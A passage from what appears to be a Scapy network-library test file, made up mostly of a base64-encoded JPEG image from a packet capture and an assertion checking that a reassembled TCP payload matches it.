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' +assert a[29].load == base64_bytes(wireshark_data) + +# This a valid JPEG image: try it out +# open("image.jpg", "wb").write(a[29].load) + += TCPSession - dissect HTTP 